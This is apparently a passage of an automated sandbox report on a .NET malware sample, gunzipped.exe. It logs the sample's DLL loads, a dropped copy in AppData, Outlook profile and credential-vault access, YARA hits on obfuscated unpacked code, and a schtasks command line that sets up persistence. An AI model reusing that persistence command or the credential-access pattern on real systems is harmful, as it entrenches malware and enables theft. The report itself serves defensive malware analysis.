                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\gunzipped.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: gunzipped.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: gunzipped.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.cs.Net Code: jZ3j8udRga System.Reflection.Assembly.Load(byte[])
                Source: 0.2.gunzipped.exe.5110000.5.raw.unpack, LoginForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, LoginForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 9.2.WiHDtnb.exe.2c6d1d4.0.raw.unpack, LoginForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: Yara matchFile source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: WiHDtnb.exe PID: 6148, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_058512C8 push esp; ret 9_2_058512C9
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_0585C23C pushad ; ret 9_2_0585C23F
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_06322247 push es; ret 9_2_06322260
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 12_2_00402AC0 push eax; ret 12_2_00402AD4
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 12_2_00402AC0 push eax; ret 12_2_00402AFC
                Source: gunzipped.exeStatic PE information: section name: .text entropy: 7.886814119771072
                Source: WiHDtnb.exe.0.drStatic PE information: section name: .text entropy: 7.886814119771072
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, Jn2EnVIQDOPAQsH9rP.csHigh entropy of concatenated method names: 'Dispose', 'fl32WdCKVL', 'i0JJsvsUZN', 'CZu44rplHX', 'JLW2wUQ7jT', 'pxt2zDcXXg', 'ProcessDialogKey', 'SflJYYTyES', 'WioJ2N1RU7', 'XFTJJbDhmT'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, rBPbMmzMtjydMGnjn4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLoqbrrr0f', 'RqnqXKiAYi', 'NlJqdQyjd4', 'klDqTqPE38', 'A5Vqvxg4wn', 'bRYqq4SJCJ', 'uBDqkFM5Co'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, YXLBSmHeAMwuvB1LF5.csHigh entropy of concatenated method names: 'zWnGoi1ScL', 'PRQG06SnTo', 'b1lG5uvZmS', 'DlEGa8lCST', 'RdnGP8GmDj', 'Q8J5pukTl5', 'PQi5NyWus0', 'P9f5yxLZt7', 'wjZ5fFg8Xq', 'Kuh5WGvsjP'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, h17c3NXtdNiUK364F8.csHigh entropy of concatenated method names: 'Qjb0ZlJLYr', 'Tho0Bs5vhM', 'sgg03S1ddt', 'Gfx0VrebwU', 'ouN0prX4ZE', 'qWB0NaXcsa', 'AaS0yRKXWt', 'nJs0fv38XX', 'xZP0WsJmAb', 'jSP0wKdbSE'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, vdXHWAhggmuwWk28UG.csHigh entropy of concatenated method names: 'n7VaQ7jJFD', 'lRUamUKjGD', 'NE4a8xbneo', 'tfraELnnTY', 'Rw6axfFQX7', 'fHLaKOdLdQ', 'Sc4acDtbpx', 'AqNalbxp6K', 'cXxa9dpOZP', 'XNRaCVpscU'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, CQlcd80GsnC8o2YDwN.csHigh entropy of concatenated method names: 'l7XvMBvgWa', 'ab7v0TxHPs', 'OO3vUkXy7c', 'c58v5r0JUq', 'T54vG0f89s', 'LG9va6xh0Y', 'aFavPA5wBR', 'bkrvS1YguX', 'wgFvhiI0pK', 'gblvA6CHa0'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, I5OmECnjy883pdUQsx.csHigh entropy of concatenated method names: 'efeUEG7RaE', 'VqTUKYCl9F', 'D4HUlJlUkR', 'xStU9n51bn', 'K8aUXL3x6p', 'BkcUdOSGjR', 'XF9UTtWGDl', 'LjkUvyDQpS', 'XtyUqYpxvU', 'D4yUkENaUd'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, oZqwNLW6n8ZvFWkqcr.csHigh entropy of concatenated method names: 'va38vywhi', 'IlyE0SsL1', 'TjlKrcnqj', 'VBvcjROEQ', 'cHl94WOcv', 'g7aCMVe7t', 'kdrOhajPO2heXmj8Y5', 'FHGppeguJiAF9Lp3Za', 'D7H7LTb1sFY1J4jOse', 'bCpvNAJXx'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, IqUFlYUT5mgAcFF8QH.csHigh entropy of concatenated method names: 'qTMXHFxni6', 'VPeX19PQDM', 'ybFXZncnkG', 'qQBXBEA42i', 'NbxXsoIAox', 'HGqXOiA9xl', 'dHKXLfc0gV', 'mWWXD7egBP', 'qiHXihsEFQ', 'wduXuWEuVg'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, XhfMnd878lAOdC1G2f.csHigh entropy of concatenated method names: 'xCoblSyDyr', 'EVGb9in1HV', 'sldbIvgse7', 'yXabs86xDg', 'aiQbLnZhZU', 'I4qbDpd1mB', 'wZ3buR6y3x', 'EV0b6F0W6X', 'LB1bHPQCIH', 'Kq8brwSHOe'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, IQxL105Tu2BGiAI5Mx.csHigh entropy of concatenated method names: 'Cl1vIN4EMT', 'YCUvsSOymS', 'qoLvOfiJAb', 'JZcvL6nxvm', 'uCUvZIBphK', 'enDvDQFiTh', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, q03tcrBrNaye7G2suDI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'z1NkZasdmL', 'hKxkBnbC8X', 'WSpk3hqIb9', 'w5vkVX3Zyw', 'B81kpdwusW', 'XknkN8NOSj', 'bepkyCEjiD'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, LQIEEZqSBkUyfaw4Mb.csHigh entropy of concatenated method names: 'V2t2a9KA8h', 'dU62PYiCSe', 'EwX2hvl4UX', 'vHF2AVgEZt', 'arR2XBM0QJ', 'UiU2d7VAdE', 'ftxDWv0GvAtG2aTrPk', 'nxf5JiMJB4glmFsPQB', 'dtT22ttp8r', 'xvb2gSn6Z1'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, mIR5saYmuhXPx2Zl9f.csHigh entropy of concatenated method names: 'aEQTfarKes', 'GRwTwFuHuX', 'GHwvY94jxS', 'kqKv21Wamn', 'HgwTr9pp2P', 'JT6T1EVRsb', 'TZZT7CjLUl', 'd6PTZruoy8', 'LHgTBBA5JA', 'SrRT3BInVB'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, x7K8maR0qhDw2haw0u.csHigh entropy of concatenated method names: 'gTO5xAatZU', 'u405cqHQdt', 'eaUUOZD5XN', 'fVmULnA7gO', 'VJGUDVSOsO', 'cGgUiD2Lah', 'p1sUuaHLBX', 'jHRU6ghouj', 'wRvUR38ENN', 'wSkUHtCbl7'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, FtjtbYBFqN1dUmF0V1a.csHigh entropy of concatenated method names: 'N6oqQ3oC2t', 'IAuqmaMbSb', 'Gtlq8tWifO', 'aHhqE1a8C7', 'O1fqxPBcsQ', 'H7VqKZnYxM', 'yrnqcPsNZi', 'TKYqlv0EuZ', 'mbSq93mHCq', 'BMSqCIh3NY'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, AtgduKZWyWTv7OA0rF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'B1aJWJgnRJ', 'hCiJwQ6t0h', 'tkUJzZKUjX', 'qOMgYd2SVG', 'r90g2qdaR2', 'HA1gJUHBJC', 'gJRggOWIu9', 'mJqSjZplnIy8ANkuNWS'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, Vh06207SCl76GKsVrU.csHigh entropy of concatenated method names: 'b0kq2qaVdp', 'ynqqgRWFCW', 'g69qjTln9g', 'kMnqMqgWt4', 'Mo6q0V8TmJ', 'UoPq5M0gFu', 'OKHqG9AU11', 'gonvyBg0cu', 'JwdvfEh4su', 'WnIvWoFg3d'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.csHigh entropy of concatenated method names: 'RyxgoKu4hA', 'J6PgMFrKhD', 'W5xg0YFccC', 'b8XgUGf7EE', 'EH6g5PQcEY', 'gRegGLCeXy', 'skFgaBIDvO', 'E1ygPLCLDj', 'UZsgSk6coO', 'tyUghZ3UlC'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, JR1vqud7YpclTLHFs7.csHigh entropy of concatenated method names: 'ToString', 'K1Ldr8JheI', 'NlJdslW34E', 'lBddOe4olE', 'fBPdLaWdcb', 'isFdDpqPjA', 'wI5difqVNb', 'vQbdul9Kfu', 'q9Id6bCKKH', 'gCedRAmhBy'
                Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, lSgBETOKP5wE1xrnvT.csHigh entropy of concatenated method names: 'zQpaMA6sLw', 'Ka4aU2psGW', 'cBOaGokXuY', 'NOTGw9kNIY', 'MvPGzWAHm2', 'KZ9aYk0biN', 'wd8a23YbD9', 'YBgaJrcatf', 'DQCagXVQQV', 'UYVajyyyp9'
                Source: C:\Users\user\Desktop\gunzipped.exeFile created: C:\Users\user\AppData\Roaming\WiHDtnb.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\gunzipped.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gunzipped.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
